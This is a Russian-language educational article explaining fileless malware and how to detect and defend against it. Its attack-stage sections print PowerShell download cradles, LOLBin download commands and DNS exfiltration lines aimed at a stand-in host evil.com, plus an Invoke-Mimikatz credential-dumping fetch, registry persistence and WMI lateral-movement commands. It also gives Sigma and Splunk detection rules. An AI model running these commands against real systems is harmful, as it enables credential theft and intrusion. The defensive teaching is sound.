Представьте: антивирус показывает, что система чистая. Сканирование диска не нашло ни одной угрозы. Все файлы проверены, все хеши соответствуют базе данных. Зелёная галочка — система защищена. Но в это самое время злоумышленник копирует ваши пароли, документы и финансовые данные прямо из оперативной памяти компьютера.
Это и есть Fileless Malware — вредоносное ПО без файлов. Малварь, которая существует только в памяти компьютера, не оставляя следов на жёстком диске. Антивирус не может её найти, потому что ищет файлы. А файлов нет. Есть только код, работающий в RAM, используя легитимные системные инструменты.
Содержание
1. Введение: Невидимая угроза в памяти2. Что такое Fileless Malware простыми словами
3. Почему fileless атаки так опасны
4. История: от Code Red до Living off the Land
5. Как работает fileless malware
6. Типы fileless атак: PowerShell, WMI, Registry
7. Living off the Land: использование легитимных инструментов
8. Реальные кейсы: APT29, Emotet, TrickBot
9. Почему антивирусы бессильны
10. Как обнаружить fileless malware
11. Инструменты и техники защиты
12. Memory Forensics: анализ оперативной памяти
13. Часто задаваемые вопросы
14. Заключение: Будущее борьбы с fileless угрозами
Введение: Невидимая угроза в памяти
В 2026 году fileless атаки стали мейнстримом киберпреступности. По данным исследований, такие атаки выросли на 265% за последние годы. Восемь из десяти успешных взломов используют fileless техники. Почему? Потому что это работает. Традиционные средства защиты оказались бессильны против угрозы, которая живёт только в памяти.
Представьте вирус, который:
- Не скачивает вредоносные файлы на диск
- Использует только встроенные инструменты Windows (PowerShell, WMI)
- Работает из-под легитимных процессов
- Исчезает после перезагрузки, не оставив следов
- Обходит 80% антивирусных решений
Звучит как научная фантастика? Это реальность 2026 года. APT-группы из России, Китая, Ирана используют эти техники постоянно. Вредоносы Emotet, TrickBot, Cobalt Strike стали классикой fileless атак.
В этой статье мы простыми словами разберём, как работает fileless malware, почему традиционные антивирусы его не видят, и главное — как обнаружить эту невидимую угрозу. Вы узнаете о техниках Living off the Land, анализе памяти, индикаторах атак и современных методах защиты.
Что такое Fileless Malware простыми словами
Fileless Malware — это вредоносное программное обеспечение, которое работает полностью в оперативной памяти компьютера, не записывая исполняемые файлы на жёсткий диск. Отсюда название: fileless — "без файлов".
Как это работает на простом примере
Представьте преступника, который хочет ограбить банк. Есть два подхода:
Традиционный вирус (с файлами):
- Преступник приносит с собой инструменты для взлома
- Оставляет их в банке
- Охрана находит инструменты и поднимает тревогу
- Преступник пойман
Fileless malware:
- Преступник не приносит инструментов
- Он использует инструменты самого банка (которые есть у охраны и персонала)
- Работает под видом сотрудника банка
- Охрана не подозревает ничего странного
- После ограбления не остаётся улик
Именно так работает fileless малварь. Она не приносит свои исполняемые файлы, а использует легитимные программы, которые уже есть в системе: PowerShell, Windows Management Instrumentation (WMI), командную строку, системные утилиты.
Почему это "fileless"
Что НЕ делает fileless малварь:
- НЕ скачивает .exe или .dll файлы на диск
- НЕ создаёт новые исполняемые файлы
- НЕ модифицирует существующие программы на диске
- НЕ оставляет артефактов, которые может найти антивирус
Что делает fileless малварь:
- Загружает вредоносный код напрямую в RAM
- Использует легитимные системные инструменты
- Работает под видом обычных системных процессов
- После перезагрузки исчезает из памяти (если не настроила persistence)
Пример простой fileless атаки
Шаг 1: Пользователь получает фишинговое письмо с документом Word
Шаг 2: В документе скрыт макрос:
powershell
powershell.exe -windowstyle hidden -exec bypass -c
"IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
Шаг 3: Эта команда:
- Запускает PowerShell (легитимная программа Windows)
- Скачивает скрипт из интернета НАПРЯМУЮ В ПАМЯТЬ
- Выполняет скрипт прямо в памяти
- Скрипт может красть данные, устанавливать бэкдор
Шаг 4: После перезагрузки следов не остаётся
Сравнение с обычным вирусом
| Критерий | Обычный вирус | Fileless Malware |
|---|---|---|
| Файлы на диске | Да, .exe, .dll | Нет файлов |
| Обнаружение AV | Легко | Очень сложно |
| Инструменты | Собственные | Системные |
| След после перезагрузки | Остаётся | Исчезает |
| Обнаружение | ~95% | ~20% |
Почему fileless атаки так опасны
Причина 1: Обход традиционных защит
Антивирусы сканируют файлы на диске. Но если нет файлов — нечего сканировать. Исследование показало: 80% антивирусов НЕ обнаружили ни одной fileless атаки.
Причина 2: Использование доверенных инструментов
Fileless атаки используют:
PowerShell:
- Предустановлен в Windows
- Имеет доступ ко всем API
- В whitelist по умолчанию
WMI:
- Система управления Windows
- Используется администраторами
- Может создавать процессы
MSBuild.exe:
- Подписан Microsoft
- Может выполнять код из XML
Причина 3: Отсутствие артефактов
После атаки не остаётся улик. Форензик проверяет диск — ничего. Логи показывают только запуск PowerShell, что нормально для админов.
Причина 4: Эффективность против песочниц
Fileless малварь может:
- Обнаружить виртуальную среду
- Не активироваться в sandbox
- Активироваться только при определённых условиях
Причина 5: Persistence без файлов
Через реестр Windows:
hkey_current_user
\Software\Microsoft\Windows\CurrentVersion\Run
Команда PowerShell записывается в ключ. При каждой загрузке Windows выполняет её, загружая малварь из интернета.
Статистика угрозы 2026
- 265% увеличение fileless атак с 2019
- 94% рост PowerShell-атак за 6 месяцев 2018
- 8 из 10 успешных data breach использовали fileless
История: от Code Red до Living off the Land
2001: Code Red — первый fileless вирус
Code Red червь:
- Эксплуатировал уязвимость IIS
- Загружался в память сервера
- НЕ записывал файлы
- Заразил 359,000 серверов за 14 часов
- Ущерб $2.6 миллиарда
2014: Poweliks — persistence без файлов
Poweliks троян:
- Первый fileless с постоянством
- Код хранился в Registry
- Использовал PowerShell
Механизм:
hkcu
\...\Run
"Service" = "rundll32.exe alert(atob('BASE64_CODE'))"
2015-2016: Взрыв PowerShell-атак
PowerShell стал любимым инструментом:
- DNSMessenger — C&C через DNS
- PowerWare — ransomware на PowerShell
- Invoke-Mimikatz — кража паролей
2017: APT29 и POSHSPY
Российская APT-группа показала мастер-класс:
- Только легитимные инструменты Windows
- PowerShell для команд
- WMI для persistence
- Ноль вредоносных файлов
2020-2026: Living off the Land норма
Популярные LOLBins:
- powershell.exe
- wmic.exe
- mshta.exe
- rundll32.exe
- msbuild.exe
- certutil.exe
Современные кампании:
- APT40 — WMI lateral movement
- Carbanak — fileless banking
- Lazarus — PowerShell для крипты
Как работает fileless malware
Этап 1: Начальный доступ
Phishing email:
Документ Word с макросом, который выполняет PowerShell.
Exploit Kit:
Сайт эксплуатирует уязвимость браузера, выполняя код в памяти.
Supply Chain:
Компрометация легитимного ПО.
Этап 2: Execution в памяти
Макрос выполняет:
powershell
powershell.exe -NoP -sta -NonI -W Hidden -Enc <BASE64>
Декодированная команда:
powershell
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/stage2.ps1')
Скрипт загружается НАПРЯМУЮ В ПАМЯТЬ.
Этап 3: In-Memory Execution
Reflective DLL Injection:
powershell
$bytes = (New-Object Net.WebClient).DownloadData('http://evil.com/payload.dll')
$assembly = [System.Reflection.Assembly]::Load($bytes)
$assembly.EntryPoint.Invoke($null, $null)
DLL выполняется из памяти, файла нет.
Этап 4: Persistence
Registry Run Keys:
powershell
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "powershell.exe -w hidden -enc <BASE64>"
WMI Event Subscription:
Триггер, который запускает команды автоматически.
Этап 5: Credential Theft
Mimikatz в памяти:
powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
Пароли извлечены из памяти lsass.exe.
Этап 6: Lateral Movement
WMI Remote Execution:
powershell
Invoke-WmiMethod -ComputerName TARGET-PC -Class Win32_Process -Name Create -ArgumentList "powershell.exe -enc <BASE64>"
Этап 7: Exfiltration
Через DNS:
powershell
$data = Get-Content "C:\sensitive.txt" | ConvertTo-Base64
foreach ($chunk in $chunks) {
Resolve-DnsName -Name "$chunk.evil.com" -Type A
}
Типы fileless атак: PowerShell, WMI, Registry
Тип 1: PowerShell-based
Encoded Commands:
powershell
powershell.exe -EncodedCommand <BASE64>
Download Cradle:
powershell
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')
Reflective Loading:
powershell
[System.Reflection.Assembly]::Load($bytes)
Тип 2: WMI атаки
Создание процесса:
powershell
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe"
Удалённое выполнение:
powershell
Invoke-WmiMethod -ComputerName REMOTE -Class Win32_Process -Name Create
Тип 3: Registry Resident
Метод Poweliks:
hkcu
\...\Run
"Service" = "rundll32.exe alert(atob('BASE64'))"
Тип 4: Memory Injection
Process Hollowing:
1. Создать процесс в suspended
2. Вычистить память
3. Записать вредоносный код
4. Возобновить
DLL Injection:
- CreateRemoteThread
- QueueUserAPC
- Reflective DLL Injection
Тип 5: Script-based
JavaScript/VBScript:
html
<script language="JScript">
var xhr = new ActiveXObject("Microsoft.XMLHTTP");
xhr.open("GET", "http://evil.com/payload.txt", false);
xhr.send();
eval(xhr.responseText);
</script>
Тип 6: Macro-based
Office Macros:
vb
Sub Auto_Open()
Shell "powershell.exe -w hidden -enc <BASE64>", vbHide
End Sub
Living off the Land: использование легитимных инструментов
Что такое LOLBins
LOLBins — Living Off the Land Binaries — легитимные файлы Windows для вредоносных целей.
Таблица популярных LOLBins
| LOLBin | Назначение | Вредоносное использование |
|---|---|---|
| powershell.exe | Скриптовый язык | Выполнение скриптов, скачивание |
| certutil.exe | Сертификаты | Скачивание файлов |
| mshta.exe | HTA-приложения | JavaScript из URL |
| regsvr32.exe | Регистрация COM | Scriptlets из интернета |
| rundll32.exe | Загрузка DLL | Выполнение DLL |
| bitsadmin.exe | BITS downloads | Скачивание payload |
| wmic.exe | WMI управление | Remote execution |
| msbuild.exe | .NET сборка | Выполнение C# из XML |
Примеры использования
certutil для скачивания:
cmd
certutil.exe -urlcache -split -f http://evil.com/payload.exe malware.exe
mshta из URL:
cmd
mshta.exe http://evil.com/payload.hta
regsvr32 Squiblydoo:
cmd
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll
msbuild выполнение кода:
xml
<Project ToolsVersion="4.0">
<Target Name="Malicious">
<ClassExample />
</Target>
<UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
public class ClassExample : ITask {
public bool Execute() {
System.Diagnostics.Process.Start("calc.exe");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Сохранить как build.xml и выполнить:
cmd
msbuild.exe build.xml
LOLBAS Project
Ресурс: https://lolbas-project.github.io/
Категории:
- Download — скачивание
- Execute — выполнение
- AWL Bypass — обход whitelisting
- Compile — компиляция
- Credentials — кража
Реальные кейсы: APT29, Emotet, TrickBot
Кейс 1: APT29 (Cozy Bear) — POSHSPY
Кто: Российская APT-группа
Когда: 2015-2017
Цели: Правительственные организации
Техника:
1. Spear-phishing с макросом
2. Macro запускает PowerShell
3. Stage 1 скачивает Stage 2 в память
4. POSHSPY устанавливает WMI persistence
5. Invoke-Mimikatz крадёт пароли
6. C&C через DNS TXT
Результат:
- Ноль файлов
- Обход всех AV
- Обнаружена через memory analysis
Кейс 2: Emotet — король fileless
Масштаб: Миллионы заражённых
Схема 2019:
1. Phishing с Invoice.doc
2. Macro выполняет PowerShell
3. Stage 1 скачивает DLL в память
4. Reflective DLL Injection в explorer.exe
5. Emotet крадёт email, распространяет спам
6. Скачивает TrickBot, Ryuk
Почему успешен:
- 80% AV не обнаружили
- Легитимные процессы
- Модульная архитектура
Кейс 3: TrickBot — fileless evolution
Филособия: Постоянная адаптация
Fileless компоненты:
- PowerShell Empire modules
- Lateral movement через WMI
- Invoke-Mimikatz
- In-memory web injection
Эволюция 2020-2026:
Платформа для Ransomware-as-a-Service.
Кейс 4: Carbanak — $1 млрд heist
Ущерб: Более $1 млрд у банков
Схема:
1. Spear-phishing сотрудника
2. Exploit загружает backdoor в память
3. Reconnaissance через WMI/PowerShell
4. Lateral movement fileless
5. Наблюдение за бухгалтерами
6. Кража через:
- Манипуляция платёжными системами
- Удалённое управление банкоматами
- Инфляция счетов
Результат:
100+ банков в 40 странах. Среднее $10 млн с банка.
Почему антивирусы бессильны
Проблема 1: Signature-based detection
AV сканируют файлы. Нет файлов → нечего сканировать.
Статистика: Signature-based AV обнаруживают только 5% fileless атак.
Проблема 2: Heuristic analysis
Fileless использует легитимные программы. Их поведение нормально.
Как AV различит:
- Админ запускает PowerShell — ОК
- Малварь запускает PowerShell — выглядит так же
Проблема 3: Sandbox
Anti-sandbox техники:
powershell
$manufacturer = (Get-WmiObject -Class Win32_ComputerSystem).Manufacturer
if ($manufacturer -like "*VMware*") {
exit # Не активируемся
}
Time-based: Активация через час, sandbox проверяет 5 минут.
Проблема 4: Application Whitelisting
LOLBins подписаны Microsoft → в whitelist.
powershell.exe нельзя заблокировать — сломается админ.
Проблема 5: Memory Protection
DEP и ASLR обходятся:
- Return-Oriented Programming (ROP)
- Reflective DLL Injection
Проблема 6: Obfuscation
PowerShell может быть закодирован:
powershell
powershell.exe -EncodedCommand <BASE64>
Многоуровневое кодирование, шифрование.
Статистика провала
Исследование NSS Labs:
- 12 major AV products
- Average detection: 18%
- Best: 42%
- Worst: 3%
82% fileless атак пропускаются.
Как обнаружить fileless malware
Метод 1: Мониторинг PowerShell
Включить логирование:
- Module Logging
- Script Block Logging
- Transcription
Что искать:
- `-EncodedCommand` или `-enc`
- `DownloadString`
- `Invoke-Expression` или `IEX`
- `Invoke-Mimikatz`
- `-WindowStyle Hidden`
- `Bypass`
Метод 2: Command Line Auditing
Sysmon:
cmd
sysmon.exe -accepteula -i sysmonconfig.xml
Event ID 1: Process Creation + командная строка
Пример детектирования:
parentimage
: WINWORD.EXE
Image: cmd.exe
CommandLine: cmd.exe /c powershell.exe -enc...
Red flag: Word запустил cmd.exe!
Метод 3: Behavioral Analytics
Подозрительное:
- PowerShell из Office
- WMI создаёт процессы удалённо
- Certutil скачивает из интернета
- Regsvr32 подключается к сети
Sigma Rules:
yaml
title: PowerShell Invoke-Mimikatz
detection:
selection:
EventID: 4104
ScriptBlockText|contains:
- 'Invoke-Mimikatz'
- 'DumpCreds'
condition: selection
level: high
Метод 4: Memory Analysis
Volatility:
bash
vol -f memory.dmp windows.pslist
vol -f memory.dmp windows.malfind
vol -f memory.dmp windows.consoles
Strings в памяти:
bash
strings powershell_dump.dmp | grep -i "invoke\|download\|iex"
Метод 5: Network Traffic
DNS-запросы: DGA домены
HTTP/HTTPS: PowerShell скачивает payload
Beacon-паттерны: Регулярные подключения к C&C
Метод 6: Registry Monitoring
RegShot: Снимок до и после
Procmon: Реальное время
Подозрительные ключи:
- PowerShell-команды в Run
- Null-байты в именах
- COM объекты на скрипты
Метод 7: EDR Solutions
Современные EDR:
- CrowdStrike Falcon
- SentinelOne
- Carbon Black
- Microsoft Defender ATP
Возможности:
- Behavioral analysis
- Memory scanning
- ML детектирование
- Threat Hunting
- Auto response
Инструменты и техники защиты
Уровень 1: Prevention
Отключить PowerShell для пользователей:
group
Policy → Windows PowerShell → Turn off
Constrained Language Mode:
powershell
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
Application Whitelisting:
- Allow only signed
- Block -EncodedCommand
- Block mshta, regsvr32
Disable WMI remote:
group
Policy → WMI → Disable remote execution
Disable Office Macros:
group
Policy → Microsoft Office → Disable macros
Уровень 2: Detection
Sysmon:
swiftonsecurity
config
https://github.com/SwiftOnSecurity/sysmon-config
SIEM Integration:
- Windows Event Logs
- Sysmon Logs
- PowerShell Logs
- Network Traffic
Alerts:
Alert 1: PowerShell Download
source
="PowerShell" (DownloadString OR "Net.WebClient")
Alert 2: Encoded PowerShell
source
="Sysmon" EventCode=1 CommandLine=*-enc*
Alert 3: Office spawns PowerShell
source
="Sysmon" ParentImage=*WINWORD.EXE* Image=*powershell.exe*
Уровень 3: Response
Automated:
1. Isolate endpoint
2. Kill процесс
3. Memory dump
4. Notify SOC
Скрипт:
powershell
if ($ScriptBlockText -like "*Invoke-Mimikatz*") {
Stop-Process -Id $PID -Force
Disable-NetAdapter -Name "Ethernet"
Send-MailMessage -To "soc@company.com"
}
Уровень 4: Threat Hunting
Hunt 1:
source
="Sysmon" CommandLine=*-enc* earliest=-7d
| stats count by ComputerName, CommandLine
Hunt 2:
source
="Sysmon" EventCode=3 DestinationPort=53 Image!=*dnscache.exe*
Hunt 3:
source
="Sysmon" ParentImage=*wmiprvse.exe* Image=*powershell.exe*
Memory Forensics: анализ оперативной памяти
Создание дампа
FTK Imager:
file
→ Capture Memory
Magnet RAM Capture:
magnetramcapture
.exe
DumpIt:
dumpit
.exe
Анализ с Volatility 3
Установка:
bash
pip install volatility3
Команды:
Список процессов:
bash
vol -f memory.dmp windows.pslist
Скрытые процессы:
bash
vol -f memory.dmp windows.psscan
Network connections:
bash
vol -f memory.dmp windows.netscan
DLLs:
bash
vol -f memory.dmp windows.dlllist --pid 1234
Malfind:
bash
vol -f memory.dmp windows.malfind
Cmdline:
bash
vol -f memory.dmp windows.cmdline
Специфичный анализ
PowerShell history:
bash
vol -f memory.dmp windows.consoles
PowerShell скрипты:
bash
vol -f memory.dmp -o ./dump windows.memmap --pid <PID> --dump
strings dump.dmp | grep -i "invoke\|download"
Mimikatz:
bash
vol -f memory.dmp windows.vadinfo --pid <lsass_PID> | grep -i "mimikatz"
Часто задаваемые вопросы
Что такое Fileless Malware простыми словами?
Fileless Malware — вредоносное ПО, работающее только в памяти, не сохраняя файлы на диск. Использует легитимные инструменты Windows (PowerShell, WMI). Антивирусы его не видят, потому что ищут файлы, а файлов нет.
Почему антивирусы не могут обнаружить fileless малварь?
Традиционные антивирусы сканируют файлы на диске и сравнивают с базой сигнатур. Fileless не создаёт файлы и использует легитимные программы Windows, подписанные Microsoft. Только 18% fileless атак обнаруживается антивирусами.
Как fileless малварь остаётся после перезагрузки?
Через persistence без файлов: записывает PowerShell-команды в Registry (ключи Run), создаёт WMI Event Subscriptions (автоматические триггеры), использует Scheduled Tasks. При каждой загрузке Windows выполняет команды, загружая малварь из интернета в память.
Что такое Living off the Land?
Living off the Land (LotL) — тактика использования только инструментов, уже имеющихся в системе (LOLBins). Примеры: PowerShell, certutil, mshta, regsvr32. Все легитимные, подписаны Microsoft, но могут использоваться вредоносно. Делает атаку практически невидимой.
Как обнаружить fileless атаку?
Основные методы: мониторинг PowerShell Activity (Script Block Logging), Sysmon для логирования командных строк, behavioral analytics (поиск аномалий), memory forensics (анализ памяти), современные EDR с Machine Learning, threat hunting (активный поиск).
Можно ли полностью защититься?
100% защиты нет, но можно снизить риски: отключить PowerShell для обычных пользователей, Application Whitelisting, PowerShell Logging и Constrained Language Mode, EDR-решения, регулярный threat hunting, обучение сотрудников.
Какие инструменты лучше для обнаружения?
Sysmon (логирование), Volatility (memory forensics), EDR (CrowdStrike, SentinelOne, Microsoft Defender ATP), SIEM (Splunk, ELK) для корреляции, Zeek для анализа трафика. Важна комбинация инструментов.
Исчезает ли fileless малварь после перезагрузки?
Зависит от persistence. Если не настроена — да, память очищается. Но современные fileless угрозы всегда создают persistence через Registry, WMI Events, Scheduled Tasks, поэтому возвращаются после перезагрузки.
Заключение: Будущее борьбы с fileless угрозами
Fileless Malware перестала быть экзотикой. В 2026 году это стандартная тактика APT-группировок, киберпреступников и ransomware-операторов. Каждая вторая успешная атака использует fileless техники. Традиционная парадигма "сканируй файлы, блокируй вредоносов" больше не работает.
В этой статье мы простыми словами разобрали, как работает fileless малварь — от базовых PowerShell-скриптов до сложных APT-кампаний. Вы узнали, почему антивирусы бессильны против угрозы в памяти. Изучили реальные кейсы: APT29, Emotet, TrickBot, Carbanak — примеры того, как fileless техники позволяют красть миллиарды.
Мы рассмотрели Living off the Land — использование легитимных инструментов Windows. Разобрали LOLBins: PowerShell, WMI, certutil, mshta. Изучили методы обнаружения: от PowerShell Logging и Sysmon до memory forensics с Volatility.
Главный урок: защита от fileless требует смены мышления. Мониторить поведение, а не файлы. Искать аномалии, а не сигнатуры. Анализировать память, а не диск. Использовать EDR, SIEM, threat hunting, а не только антивирус.
Будущее безопасности:
- Behavioral Analytics — ML для детектирования аномалий
- Memory Protection — защита и мониторинг RAM
- Zero Trust — не доверять ничему
- Threat Hunting — активный поиск угроз
- EDR — комплексный мониторинг endpoint'ов
Fileless малварь — не временный тренд. Это новая реальность кибербезопасности. Пока в Windows есть PowerShell, WMI и легитимные утилиты — fileless атаки будут существовать. Вопрос не в том, придёт ли fileless угроза в вашу сеть. Вопрос в том, обнаружите ли вы её до того, как будет поздно.
Продолжайте изучать. Практикуйтесь в memory forensics. Настраивайте мониторинг PowerShell. Внедряйте EDR. Проводите threat hunting. И помните: в мире, где угрозы живут только в памяти, единственная защита — знание и правильные инструменты.
Полезные ресурсы:
- Volatility Foundation — memory forensics framework
- LOLBAS Project — база LOLBins
- SwiftOnSecurity Sysmon Config — конфиг Sysmon
- Sigma Rules — правила детектирования
- MITRE ATT&CK — матрица тактик атакующих
